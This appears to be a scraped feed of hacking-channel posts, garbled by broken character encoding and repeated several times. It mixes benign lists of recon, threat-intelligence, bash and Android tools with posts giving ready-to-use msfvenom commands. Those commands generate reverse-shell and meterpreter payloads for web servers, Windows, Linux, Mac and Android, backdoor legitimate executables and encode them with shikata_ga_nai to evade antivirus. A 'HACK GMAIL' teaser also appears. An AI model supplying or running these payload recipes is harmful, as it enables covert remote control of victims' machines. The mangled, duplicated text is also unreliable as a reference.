β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web #Payloads Commands Metasploit
1οΈβ£
3οΈβ£
5οΈβ£
6οΈβ£ Creates a Simple TCP Shell for Javascript
7οΈβ£ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`
8οΈβ£ Creates a Simple TCP Shell for WAR
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Web #Payloads Commands Metasploit
1οΈβ£
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
2οΈβ£ Creates a Simple TCP Shell for PHP3οΈβ£
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
4οΈβ£Creates a Simple TCP Shell for ASP5οΈβ£
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp 6οΈβ£ Creates a Simple TCP Shell for Javascript
7οΈβ£ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`
8οΈβ£ Creates a Simple TCP Shell for WAR
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicatorsβ¦
The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). - ciscocsirt/GOSINT
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IP address and DNS #Lookup Tools 2020 :
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IP address and DNS #Lookup Tools 2020 :
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
bgpview.io
BGPView - BGP Toolkit and BGP ASN Routing Lookup Tool
BGPView allows you to debug and investigate information about IP addresses, ASN, IXs, BGP, ISPs, Prefixes and Domain names.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Public Pen Testing Reports recommended :
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1οΈβ£Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2οΈβ£ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3οΈβ£ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4οΈβ£ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5οΈβ£ Dradis Framework | https://dradisframework.com/ce/ |
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Public Pen Testing Reports recommended :
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1οΈβ£Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2οΈβ£ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3οΈβ£ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4οΈβ£ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5οΈβ£ Dradis Framework | https://dradisframework.com/ce/ |
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - santosomar/public-pentesting-reports: Curated list of public penetration test reports released by several consultingβ¦
Curated list of public penetration test reports released by several consulting firms and academic security groups - santosomar/public-pentesting-reports
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Binaries with metasploit :
1) -
2) - Creates a simple TCP Payload for Windows
-
3) - Creates a simple HTTP Payload for Windows
-
4) - Creates a simple TCP Shell for Linux
5) -
6) - Creates a simple TCP Shell for Mac
7) -
8) - Creates a simple TCP Payload for Android
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Binaries with metasploit :
1) -
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 2) - Creates a simple TCP Payload for Windows
-
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 3) - Creates a simple HTTP Payload for Windows
-
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf 4) - Creates a simple TCP Shell for Linux
5) -
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho 6) - Creates a simple TCP Shell for Mac
7) -
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk 8) - Creates a simple TCP Payload for Android
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Shell Script Development :
- ansi - ANSI escape codes in pure bash
- change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces
- Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Shell Script Development :
- ansi - ANSI escape codes in pure bash
- change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces
- Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - fidian/ansi: ANSI escape codes in pure bash - change text color, position the cursor, much more
ANSI escape codes in pure bash - change text color, position the cursor, much more - fidian/ansi
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC).py
942 B
2020 Verified Cve SpotOutlook Crash 100/100
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.
> HACK GMAIL
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS π¦
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS π¦
Forwarded from UNDERCODE SECURITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create Windows Payload :
> Windows #Payloads
1οΈβ£-
2οΈβ£ - Lists all avalaible encoders
3οΈβ£-
4οΈβ£ - Binds an exe with a Payload (Backdoors an exe)
-
5οΈβ£
6οΈβ£- Creates a simple TCP payload with shikata_ga_nai encoder
7οΈβ£-
8οΈβ£ - Binds an exe with a Payload and encodes it
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create Windows Payload :
> Windows #Payloads
1οΈβ£-
msfvenom -l encoders 2οΈβ£ - Lists all avalaible encoders
3οΈβ£-
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 4οΈβ£ - Binds an exe with a Payload (Backdoors an exe)
-
5οΈβ£
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b Γ’β¬Λ\x00Γ’β¬β’ -i 3 -f exe > example.exe 6οΈβ£- Creates a simple TCP payload with shikata_ga_nai encoder
7οΈβ£-
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b Γ’β¬Ε\x00Γ’β¬Β -f exe > example.exe8οΈβ£ - Binds an exe with a Payload and encodes it
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE SECURITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Passive #Recon s:
#Website Exploration and "Google Hacking" :
* censys - https://censys.io/
* Spyse - https://spyse.com/
* netcraft - https://searchdns.netcraft.com/
* Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database/
* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/
* Certficate Search - https://crt.sh/
* Huge TLS/SSL certificate DB with advanced search - https://certdb.com/
* Google Transparency Report - https://transparencyreport.google.com/https/certificates
* SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Passive #Recon s:
#Website Exploration and "Google Hacking" :
* censys - https://censys.io/
* Spyse - https://spyse.com/
* netcraft - https://searchdns.netcraft.com/
* Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database/
* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/
* Certficate Search - https://crt.sh/
* Huge TLS/SSL certificate DB with advanced search - https://certdb.com/
* Google Transparency Report - https://transparencyreport.google.com/https/certificates
* SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Censys
Censys | The Authority for Internet Intelligence and Insights
Censys empowers security teams with the most comprehensive, accurate, and up-to-date map of the internet to defend attack surfaces and hunt for threats.